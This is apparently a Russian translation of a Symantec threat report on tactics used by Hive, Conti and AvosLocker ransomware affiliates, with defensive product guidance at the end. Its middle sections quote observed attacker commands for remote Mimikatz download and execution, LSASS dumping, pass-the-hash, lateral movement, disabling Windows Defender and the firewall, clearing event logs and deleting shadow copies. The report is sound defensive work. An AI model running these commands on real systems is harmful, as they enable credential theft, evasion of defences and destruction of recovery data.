Новейшие инструменты, тактики и процедуры, используемые в операциях с вымогательскими программами Hive, Conti и AvosLocker.
Целевые атаки программ-вымогателей остаются одним из самых серьезных киберрисков, с которыми сталкиваются организации всех размеров. Тактика, используемая злоумышленниками-вымогателями, постоянно развивается, но, определяя наиболее часто используемые инструменты, тактики и процедуры (TTP), организации могут получить более глубокое понимание того, как ransomware проникают в сети, и использовать эти знания для выявления и определения приоритетных слабых мест.
Symantec, подразделение Broadcom Software, отслеживает различные угрозы, связанные с вымогательством, однако в большинстве последних атак наблюдаются следующие три семейства вымогательских программ:
• Hive
• Conti
• Avoslocker
Подобно многим другим семействам программ-вымогателей, Hive, Conti и Avoslocker следуют бизнес-модели «программы-вымогатели как услуга» (RaaS). В модели RaaS операторы программ-вымогателей нанимают аффилированных лиц, которые отвечают за проведение атак ransomware от их имени. В большинстве случаев они придерживаются сценария, который содержит подробные шаги атаки, изложенные операторами программ-вымогателей.
После получения первоначального доступа к сети жертв Hive, Conti и Avoslocker используют множество TTP, чтобы помочь своим операторам достичь следующего:
• Добиться постоянства в сети
• Повышение привилегий
• Вмешательство в программное обеспечение безопасности и уклонение от него
• Боковое перемещение по сети
Первоначальный доступ
Аффилированные операторы ransomware Hive, Conti и Avoslocker используют различные методы, чтобы закрепиться в сетях жертв. Некоторые из этих методов включают:
• Целевой фишинг, приводящий к распространению вредоносного ПО, включая, но не ограничиваясь этим:
o IcedID
o Emotet
o QakBot
o TrickBot
• Использование преимуществ слабых учетных данных RDP
• Использование таких уязвимостей, как:
o Microsoft Exchange vulnerabilities — CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-26855
o FortiGate firewall vulnerabilities — CVE-2018-13379 and CVE-2018-13374
o Apache Log4j vulnerabily — CVE-2021-44228
В большинстве случаев фишинговые письма содержат вложения документов Microsoft Word с макросами, которые приводят к установке одной из ранее упомянутых вредоносных программ. В некоторых случаях злоумышленники используют эту вредоносную программу для установки Cobalt Strike, которая затем используется для переброски на другие системы в сети. Затем эти угрозы используются для распространения программ-вымогателей на взломанных компьютерах.
Настойчивость
После получения первоначального доступа Symantec наблюдала, как аффилированные лица всех трех семейств вымогательских программ используют стороннее программное обеспечение, такое как AnyDesk и ConnectWise Control (ранее известное как ScreenConnect), чтобы сохранить доступ к сетям жертв. Они также включают стандартный доступ к удаленному рабочему столу в брандмауэре:
netsh advfirewall firewall set rule group=»Remote Desktop» new enable=yes
Известно также, что злоумышленники создают дополнительных пользователей на взломанных системах, чтобы сохранить доступ. В некоторых случаях наблюдалось, как субъекты угроз добавляют записи в реестр, которые позволяют им автоматически входить в систему при перезагрузке компьютера:
reg add «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon» /v DefaultUserName /t REG_SZ /d <user> /f
reg add «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon» /v AutoAdminLogon /t REG_SZ /d 1 /f
Открытие
На этапе обнаружения злоумышленники пытаются прочесать сеть жертвы, чтобы выявить потенциальные цели. Symantec наблюдала, как вышеупомянутые субъекты ransomware используют следующие инструменты:
• ADRecon — Собирает информацию об Active Directory и создает отчет
• Netscan — Обнаруживает устройства в сети
Доступ к учетным данным
Mimikatz является основным инструментом для большинства групп вымогателей, и Hive, Conti и Avoslocker не являются исключением. Symantec наблюдал, как они используют версию Mimikatz для PowerShell, а также PE-версию этого инструмента. Есть также случаи, когда злоумышленники напрямую загружают PowerShell-версию Mimikatz из репозиториев GitHub:
powershell IEX((new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/<redacted>/Invoke-Mimikatz.ps1’));Invoke-Mimikatz -DumpCreds
В дополнение к использованию Mimikatz, субъекты угроз также воспользовались нативной комбинацией rundll32 и comsvcs.dll для дампа памяти LSASS:
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <process id> lsass.dmp full
Злоумышленники также создают дамп SECURITY, SYSTEM и SAM, а затем извлекают из него учетные данные. В редких случаях было замечено использование taskmgr.exe для дампа памяти LSASS, а затем использование дампа для извлечения ценных учетных данных.
Боковое движение
Злоумышленники используют такие инструменты, как PsExec, WMI и BITSAdmin, для бокового распространения и запуска программ-вымогателей в сетях жертв. Также наблюдалось, как злоумышленники используют несколько других методов для бокового перемещения по сети.
• PsExec
psexec -accepteula @ips.txt -s -d -c CSIDL_WINDOWS\xxx.exe
• WMI
wmic /node:@C:\share$\comps1.txt /user:»user» /password:»password» process call create «cmd.exe /c bitsadmin /transfer xxx \\IP\share$\xxx.exe %APPDATA%\xxx.exe&%APPDATA%\xxx.exe»
• BITSAdmin
bitsadmin /transfer debjob /download /priority normal hxxp://<IP>/ele.dll CSIDL_WINDOWS\ele.dll
• Mimikatz
mimikatz.exe «privilege::debug» «sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash>»
Уклонение от защиты
Как и в случае с рядом других семейств программ-вымогателей, Hive, Conti и Avoslocker также подделывают различные продукты безопасности, мешающие достижению их цели. Symantec наблюдал, как они вмешиваются в работу служб безопасности, используя команды net, taskkill и sc для их отключения или завершения. В некоторых случаях они также используют такие инструменты, как PC Hunter, для завершения процессов. Они также были замечены в подделке различных записей реестра, связанных с продуктами безопасности, поскольку изменения в записях реестра могут сделать эти продукты неработоспособными.
Было замечено, что Hive и AvosLocker пытаются отключить Windows Defender с помощью следующих команд reg.exe.
AvosLocker:
reg add «HKLM\SOFTWARE\Policies\Microsoft\Windows Defender» /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Hive:
reg.exe delete «HKLM\Software\Policies\Microsoft\Windows Defender» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender» /v «DisableAntiSpyware» /t REG_DWORD /d «1» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender» /v «DisableAntiVirus» /t REG_DWORD /d «1» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine» /v «MpEnablePus» /t REG_DWORD /d «0» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection» /v «DisableBehaviorMonitoring» /t REG_DWORD /d «1» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection» /v «DisableIOAVProtection» /t REG_DWORD /d «1» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection» /v «DisableOnAccessProtection» /t REG_DWORD /d «1» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection» /v «DisableRealtimeMonitoring» /t REG_DWORD /d «1» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection» /v «DisableScanOnRealtimeEnable» /t REG_DWORD /d «1» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender\Reporting» /v «DisableEnhancedNotifications» /t REG_DWORD /d «1» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet» /v «DisableBlockAtFirstSeen» /t REG_DWORD /d «1» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet» /v «SpynetReporting» /t REG_DWORD /d «0» /f
reg.exe add «HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet» /v «SubmitSamplesConsent» /t REG_DWORD /d «0» /f
reg.exe add «HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger» /v «Start» /t REG_DWORD /d «0» /f
reg.exe add «HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger» /v «Start» /t REG_DWORD /d «0» /f
reg.exe delete aHKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run” /v “Windows Defender” /f
reg.exe delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “Windows Defender” /
Отключение стандартного брандмауэра Windows также является одним из методов, используемых этими семействами вымогателей:
netsh advfirewall set allprofiles state off
Чтобы скрыть свои следы в системе жертвы, злоумышленники могут также очистить журнал событий Windows:
wevtutil.exe cl system
wevtutil.exe cl security
wevtutil.exe cl application
powershell -command «Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }»
Воздействие
Злоумышленники обычно отключают или подделывают настройки операционной системы, чтобы затруднить администраторам восстановление данных. Удаление теневых копий — распространенная тактика, которую субъекты угроз применяют перед началом процесса шифрования. Они выполняют эту задачу с помощью таких инструментов, как Vssadmin или WMIC, и выполняют одну из следующих команд:
vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy delete
Также видели, как BCDEdit используется для отключения автоматического восстановления системы и игнорирования сбоев при загрузке:
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
В некоторых случаях субъекты удаляют настройки безопасного режима в реестре, чтобы остановить запуск служб продуктов безопасности в безопасном режиме:
reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\<service> /f
Эксфильтрация
Злоумышленники обычно изымают критически важные данные из среды жертвы, прежде чем зашифровать их. Затем они используют украденные данные, пытаясь вымогать у жертв выкуп. По наблюдениям, злоумышленники используют для эксфильтрации данных следующие облачные сервисы:
• https://anonfiles.com
• https://mega.nz
• https://send.exploit.in
• https://ufile.io
• https://www.sendspace.com
Также наблюдалось, как злоумышленники используют следующие инструменты для эксфильтрации данных:
• Filezilla
• Rclone
Заключение
Описанные в этом блоге TTP представляют собой обзор текущего ландшафта угроз, связанных с выкупным ПО. TTP, используемые этими субъектами угроз, постоянно развиваются, группы постоянно корректируют свои методы, пытаясь обойти средства защиты своих целей. Поэтому организациям необходимо быть бдительными и использовать многоуровневый подход к обеспечению безопасности.
Symantec Protection
Symantec Endpoint Protection (SEP) защищает от атак программ-вымогателей с использованием нескольких статических и динамических технологий.
AV Protection
• Ransom.Hive
• Ransom.Conti
• Ransom.AvosLocker
• Backdoor.Cobalt
• Hacktool.Mimikatz
• Trojan.IcedID*
• Trojan.Emotet*
• W32.Qakbot*
• Trojan.Trickybot*
Behavioral Protection (Поведенческая защита)
• SONAR.RansomHive!g2
• SONAR.RansomHive!g3
• SONAR.RansomHive!g4
• SONAR.RansomAvos!g2
• SONAR.RansomConti!g1
• SONAR.RansomConti!g3
• SONAR.RansomConti!g4
• SONAR.Ransomware!g30
• SONAR.RansomGregor!g1
• SONAR.SuspLaunch!gen4
• SONAR.SuspLaunch!g18
• SONAR.Ransom!gen59
• SONAR.Ransomware!g26
• SONAR.Cryptlck!g171
Системы предотвращения вторжений (IPS)
IPS блокирует первоначальный доступ, постоянный доступ и боковое перемещение. Аудиторские подписи SEP предназначены для повышения осведомленности о потенциально нежелательном трафике в сети. По умолчанию, подписи аудита не блокируются. Администраторы, просматривающие журналы событий IPS в своей сети, могут отметить эти события аудита и решить, нужно ли настраивать соответствующие сигнатуры аудита для блокирования трафика.
Ниже приведен список подписей аудита, которые могут быть включены для блокирования с помощью политик действий, связанных с использованием программного обеспечения или инструментов, таких как AnyDesk, ScreenConnect и PsExec.
· 33211 [Audit: AnyDesk Remote Desktop Activity]
· 33156 [Audit: ScreenConnect Remote Support Software Activity]
· 30068 [Audit: PSExec Utility Activity]
· 33588 [Audit: WMIC Remote RPC Interface Bind Attempt]
· 33311 [Audit: PCHunter Tool Activity]
· 33295 [Attack: Ransom.Conti Activity 3]
· 33435 [Attack: Ransom.AvosLocker Activity 3]
· 33444 [Attack: Ransom.AvosLocker Activity 4]
· 32436 [Attack: Ransom.Gen Activity 29]
· 33323 [Attack: Ransom.Hive Activity]
· 33119 [Audit: RClone Tool Activity]
Symantec рекомендует включить защиту от вторжений на всех ваших устройствах, включая серверы.
Адаптивная защита
Symantec Adaptive Protection может помочь защититься от бокового перемещения и методов выполнения программ-вымогателей, используемых злоумышленниками. Если в вашей среде не используются такие инструменты, как PsExec, WMIC и BITSAdmin, то вам следует «Запретить» эти приложения и действия с помощью политик Symantec Adaptive Protection.
Рекомендации
• Клиентам рекомендуется включить систему предотвращения вторжений (IPS) на настольных компьютерах и серверах для обеспечения наилучшей защиты. Нажмите здесь для получения инструкций по включению функции настройки производительности IPS-сервера (IPS Server Performance Tuning). Эту функцию следует включить на серверах, чтобы обеспечить дополнительную настройку модуля IPS и определений в сценариях с высокой пропускной способностью.
• Клиентам также рекомендуется включить функцию Proactive Threat Protection, также известную как SONAR, которая представляет собой защиту Symantec на основе поведения.
• Клиенты также должны поддерживать Symantec Endpoint Protection (SEP) в актуальном состоянии с помощью последней версии и набора определений.
• Symantec имеет многоуровневые технологии защиты от всех типов угроз. Чтобы обеспечить наилучшую защиту, все функции SEP должны быть включены для рабочих столов и серверов Windows.
Источник: https://bit.ly/3GpqZPf
